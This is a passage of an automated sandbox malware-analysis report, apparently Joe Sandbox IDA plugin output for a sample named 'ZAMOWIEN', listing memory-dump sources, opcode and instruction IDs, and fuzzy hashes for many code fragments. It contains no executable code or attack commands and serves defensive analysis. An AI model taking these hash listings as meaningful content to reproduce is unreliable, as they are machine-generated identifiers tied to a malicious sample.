                                                                            • Instruction Fuzzy Hash: 3D411CF9601714ABE7228F79C944E97F7ECEF44B54F00491EA5AAD3294DB70EA00CB60
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd7f9f0141ef4b3ced494c0d75c4e0607c432e6298838afab840a98e01b32403
                                                                            • Instruction ID: 3c3450b4e05647163316f6343499b6a54333cb9f427e1284fc6371dda7132579
                                                                            • Opcode Fuzzy Hash: fd7f9f0141ef4b3ced494c0d75c4e0607c432e6298838afab840a98e01b32403
                                                                            • Instruction Fuzzy Hash: C3418CF8A003099FEB45CF69C5807DABBB2BF49348F64C56DD8499B251DB32D942CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1af11ee84f380470a671e878d3a6564a2c170a56c06ecd4d665735b1355a0428
                                                                            • Instruction ID: 1027c573f9ba48ee780996963781ed6f65f62a884f9b4433f7e0c60b1606d66a
                                                                            • Opcode Fuzzy Hash: 1af11ee84f380470a671e878d3a6564a2c170a56c06ecd4d665735b1355a0428
                                                                            • Instruction Fuzzy Hash: B131D579A0132CAFEB258B28CC40B9A77B5EF85714F5501D9A94DE72C0CB30AE85CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                            • Instruction ID: f6392fb0f61562cf8336eb95cf19550f858444277016b5525273a8148561b956
                                                                            • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                            • Instruction Fuzzy Hash: 01318C79600B11DFD720CF6DC880A5AB7F5FF48364B68856DD5598B650D731E881DF40
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                            • Instruction ID: 10d677f2905b5ca3244d4516cbd73b60d7486840286bb77f02e9581abc2d3af2
                                                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                            • Instruction Fuzzy Hash: FD31F27D6093459FE712DA28C800B57B7A5AB85794F44812AF8988B3C4DAB8E841C7A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: c71f7136a46dd19e558203b049e7fda83098543db3b46961904d68ac97cefc0b
                                                                            • Instruction ID: 73bd5397112ab3485c63c8091298d21760779d45b6b46d497c2aeb769077c80c
                                                                            • Opcode Fuzzy Hash: c71f7136a46dd19e558203b049e7fda83098543db3b46961904d68ac97cefc0b
                                                                            • Instruction Fuzzy Hash: 0321F57AA00715EFE3228F18C800B1A7BB5FF85758F124829A9A69F340DB70DC05CFA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                            • Instruction ID: a31972369713f3af9b81d8fe5cb982a4091cc63a5dcb00e0b5f309aaabb7d540
                                                                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                            • Instruction Fuzzy Hash: F631C1BE601205AFEB12CF58C885B5A73AEFB84795F158428ED1A9F240DB74DD40CB60
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                            • Instruction ID: ab7339f9221a3882fcf9894c40e4b0fbf80123163ab3f42ae21bb7e8eee877bd
                                                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                            • Instruction Fuzzy Hash: 2D3145BA608349DFC706CF18D840A4A7BE9FF89354F01056AF8549B3A1DB35DC14CBA2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                            • Instruction ID: 60e5969455467c33148a5449c84dd78f53b48cac0c0823b0f4ada5d92fe19b3c
                                                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                            • Instruction Fuzzy Hash: B531477960430ACFC700CF18C480A46BBF5FF89354B2586A9E9589B329EB30ED06CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b683e9a8c81a372ea07d2c46193b303f8a906b91e0149eb1c5ae73c1bffc54f
                                                                            • Instruction ID: 15b38c5e4dfb757b3adecbd65f7e611b1f50697ef046e9461df17b048284483c
                                                                            • Opcode Fuzzy Hash: 8b683e9a8c81a372ea07d2c46193b303f8a906b91e0149eb1c5ae73c1bffc54f
                                                                            • Instruction Fuzzy Hash: 7B21F3BD515314AFD611DF68CD40B1A7BE8AF5575CF004C1AEA28D7291EAA0D884CBE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8bcab2c7cd8fb6820cd4b6c84f7246cfbb0a734445821cdc77698ff0445aa26
                                                                            • Instruction ID: 4e82ae60e28c0116618da47c13ed0d9ad2dcc72e02370a654049d49b27b38ae1
                                                                            • Opcode Fuzzy Hash: c8bcab2c7cd8fb6820cd4b6c84f7246cfbb0a734445821cdc77698ff0445aa26
                                                                            • Instruction Fuzzy Hash: AA21BFBD245B95DFF3258B2DC8A0B6173E4FB41748F048496E889C7690DB78D8C2DA10
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                            • Instruction ID: 080cc84bfdde153b074e8688ad9d096aa2409fd11dfdd7ac383ff2142832d3f6
                                                                            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                            • Instruction Fuzzy Hash: 9F21C2BA2007049FD719CF15C441B56B7E9FF95364F15816DE50ACB291EBB4F801CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2bb36c883392caaea5940a59da29e929509f8d90d01d14b59ff097dd1e54db1
                                                                            • Instruction ID: fb6b4093149f626f4d9c910c6a080feba75daa46666022901f7a716af2ddf54c
                                                                            • Opcode Fuzzy Hash: c2bb36c883392caaea5940a59da29e929509f8d90d01d14b59ff097dd1e54db1
                                                                            • Instruction Fuzzy Hash: C121243C1057A9DFF7255E25CC04B0677E2FB403A4F20461AED6A46AE1DB75E882CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bde85b6c4c9c09d518826f93c6fb2e3cc9a2ddb8b2f0aa73a7f09a49c963e5e
                                                                            • Instruction ID: 78ac493a7b4d96d72e7fae1ba5e82afe4feaf8e28d8e7a1d1ee1922d0cc0b74d
                                                                            • Opcode Fuzzy Hash: 4bde85b6c4c9c09d518826f93c6fb2e3cc9a2ddb8b2f0aa73a7f09a49c963e5e
                                                                            • Instruction Fuzzy Hash: FF2125B9A147508FD310CFA98840B8BB7E9AFD5754F14496DF8AB87240DBB0A8458792
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                            • Instruction ID: 716cbca3be9750783689f5c64c13f759d1edff1da82439077cffffee47aa15ab
                                                                            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                            • Instruction Fuzzy Hash: BC21C579644704ABD3119F18DC41B5BBBA4FB88758F004229FA58AB3A0D774D801C7A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                            • Instruction ID: 84523546a70387aa2ffc85d4021ee8d82be7ec0ebf367b33e85b0e7f1329c92b
                                                                            • Opcode Fuzzy Hash: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                            • Instruction Fuzzy Hash: 4F210576900B11DFD714CF74C490669F3F5FF44394F2085AAC866AFA50EB70AA42CBA2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b90389ed74e68e16c84417875610300e87d6f1ba9da5caaf45d4deaa98e4e0da
                                                                            • Instruction ID: 14c3c8b14279bd520292897881a9d139b11a6314b4b3ac70fef246c0ec9837fd
                                                                            • Opcode Fuzzy Hash: b90389ed74e68e16c84417875610300e87d6f1ba9da5caaf45d4deaa98e4e0da
                                                                            • Instruction Fuzzy Hash: 4E2101BA209B81EFE7168B5DC884B1133A9FB4AB55F1400A5EC449F791DF79E900C661
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 648e9c023e9114d2fef009b0355e970bb94a81425d030ccb99eccdb4382a1fa0
                                                                            • Instruction ID: 22db0fa93711246065e369b91bf3f97d711b37c5e4ed7a15ef0ab845b5e50dad
                                                                            • Opcode Fuzzy Hash: 648e9c023e9114d2fef009b0355e970bb94a81425d030ccb99eccdb4382a1fa0
                                                                            • Instruction Fuzzy Hash: AC218976052A10EFD722DF28C941F49B7B6FF08708F144968E0269B6B1C774E841CF94
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                            • Instruction ID: 5ddf655d2996219910516d967dec84028d747feb5008d14013da91a92d91c56b
                                                                            • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                            • Instruction Fuzzy Hash: 9E21027D601789DFE3028B99C984F95B7E9EF40784F2940A1EC088B292EB78EC40C751
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                            • Instruction ID: d52dc6ca5a691c3fc2dd8709f0161734151804c19794aef91a4858156b87f93e
                                                                            • Opcode Fuzzy Hash: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                            • Instruction Fuzzy Hash: A811AC7E501624ABD7228F49CC50FAB7B79EF85B69F424415B928CB264DF20D800C7E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                            • Instruction ID: 1ba28b4b24e17d699efe3b5cd50c46a1ca2fb6569551fe4f8cd15083a4233023
                                                                            • Opcode Fuzzy Hash: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                            • Instruction Fuzzy Hash: 9021DC7A501601EFD701CF04C500A86BBB9FF417A9B50D1A9E80E8F2D0E731EE96CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a3f2cb43f79cb31ec7c9a0278440c70eb98be6d984e9b418ef151949a90c2b7
                                                                            • Instruction ID: dff740f86343501166c959d19f7bdc90e13273d51cb7b91faaa0a414669c702b
                                                                            • Opcode Fuzzy Hash: 7a3f2cb43f79cb31ec7c9a0278440c70eb98be6d984e9b418ef151949a90c2b7
                                                                            • Instruction Fuzzy Hash: 4221D7B891524A9BE701CF69C4847EE77A5FF8431CF258018D8165B3D0CBB99985C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6fdb732fad2ba7e3af99a27fb1b4d5fd198f5a00e40aae46c7a1ae81eca8543b
                                                                            • Instruction ID: 6979eb84c74ba46e8e06dc05e9b1194c460d57f4a9c05dedce44b1eb99d5b042
                                                                            • Opcode Fuzzy Hash: 6fdb732fad2ba7e3af99a27fb1b4d5fd198f5a00e40aae46c7a1ae81eca8543b
                                                                            • Instruction Fuzzy Hash: 7111E979151640ABD3229F2CCD40F2677A8EF86768F108439F9199B691DBB1DC81CBA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                                                            • Instruction ID: 6060f4bd1925468bf86d60f1023377cbe20fbe5644d9b2d25f44b203a6641f0b
                                                                            • Opcode Fuzzy Hash: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                                                            • Instruction Fuzzy Hash: 6111BE3A211704AFE712CB78CD40F4AB3A8FF84768F104419E4599B681EBB0F941CAA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53d772efc2e92fdeecba1ecfe69066c0d2b7f7e11ae3dfc2462a60cec29858b1
                                                                            • Instruction ID: ce1ce0c9bd7c22662f0cd487dfb9f73441a4242eed14ec5fd5b4f38024d6cb8b
                                                                            • Opcode Fuzzy Hash: 53d772efc2e92fdeecba1ecfe69066c0d2b7f7e11ae3dfc2462a60cec29858b1
                                                                            • Instruction Fuzzy Hash: 3F1122BE0B2200EBD3158F55C801B3237A8FB64B84F104825E804AB2A0D734DC82CF64
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
